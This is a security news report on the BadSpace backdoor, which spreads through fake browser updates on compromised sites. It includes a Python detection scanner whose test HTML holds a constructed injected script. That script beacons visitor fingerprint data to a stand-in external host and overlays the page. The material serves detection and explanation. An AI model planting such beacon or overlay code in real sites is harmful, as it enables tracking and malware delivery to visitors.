Attackers Compromise Legitimate Websites to Distribute BadSpace Windows Backdoor
Compromised legitimate websites are being used to deliver a Windows backdoor called BadSpace under the guise of fake browser updates.
“The criminal threat actor implements a complex sequence of attacks involving an infected website, a command-and-control (C2) server, at times a forged browser update, and a JScript downloader to install a backdoor into the victim’s device,” the German cybersecurity company G DATA stated in a report.
Details about the malware were first shared by researchers kevross33 and Gi7w0rm last month.
The attack chain begins with a compromised website, including sites built on WordPress, into which code is injected that checks whether the visitor has been to the site before.
If it is the visitor's first time on the site, the code gathers details about the device, IP address, user-agent, and location, and sends them to a hard-coded domain via an HTTP GET request.
The server's response then overlays the page content with a fake Google Chrome update pop-up, which either drops the malware directly or delivers a JavaScript downloader that in turn fetches and runs BadSpace.
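The chain above (first-visit gating, visitor fingerprinting, a GET beacon to a hard-coded domain, and a page-covering overlay) can be hunted for statically in served HTML. The following Python scanner is an added example written for this page, not code from G DATA or from the malware; the sample page it scans is constructed, and the host names and signal thresholds are assumptions.

```python
import re
from urllib.parse import urlparse

# Heuristics for the injected-script pattern described in the article:
# first-visit gating, visitor fingerprinting, a GET to a hard-coded external
# domain, and an overlay that covers the page. Each matching signal counts once.
SIGNALS = {
    "first_visit_gate": re.compile(
        r"(document\.cookie|localStorage\.getItem)\s*[^;]*(visited|seen|shown)", re.I),
    "fingerprint": re.compile(
        r"navigator\.(userAgent|platform|language)|screen\.(width|height)", re.I),
    "overlay": re.compile(
        r"position\s*:\s*fixed|z-index\s*:\s*9{3,}|createElement\(\s*['\"](iframe|div)['\"]", re.I),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)

def external_hosts(script, site_host):
    """Return hard-coded hosts in the script that are not the site's own."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(script)}
    return sorted(h for h in hosts if h and not h.endswith(site_host))

def score_script(script, site_host):
    """List the signals an inline script exhibits, plus any external hosts it contacts."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(script)]
    ext = external_hosts(script, site_host)
    if ext:
        hits.append("external_beacon")
    return hits, ext

def scan_page(html, site_host, threshold=3):
    """Flag inline scripts that show at least `threshold` signals (assumed cut-off)."""
    findings = []
    for idx, body in enumerate(SCRIPT_RE.findall(html)):
        hits, ext = score_script(body, site_host)
        if len(hits) >= threshold:
            findings.append({"script": idx, "signals": hits, "hosts": ext})
    return findings

# Constructed sample: a benign one-liner plus an injected block modelled on the
# chain in the article (hypothetical, not real BadSpace code).
SAMPLE_HTML = """<html><body>
<script>console.log(navigator.language);</script>
<script>
if (!document.cookie.match('visited')) {
  var i = new Image();
  i.src = 'https://fixed-domain.example/?ua=' + navigator.userAgent + '&w=' + screen.width;
  var d = document.createElement('div');
  d.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999';
  document.body.appendChild(d);
  document.cookie = 'visited=1';
}
</script></body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, "victim-site.example"):
        print(finding)
```

The benign script triggers only the fingerprint signal and is ignored; the injected block trips all four signals and is reported with the external host it beacons to.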
An investigation into the C2 servers used in the operation has revealed links to a known malware family, SocGholish (also known as FakeUpdates), a JavaScript-based downloader that spreads through the same means.
In addition to performing anti-sandbox checks and establishing persistence via scheduled tasks, BadSpace can collect system information and execute commands that let it capture screenshots, run commands via cmd.exe, read and write files, and delete the scheduled task.
This disclosure coincides with alerts issued by both eSentire and Sucuri about separate campaigns that use fake browser update lures on compromised sites to spread information stealers and remote access trojans.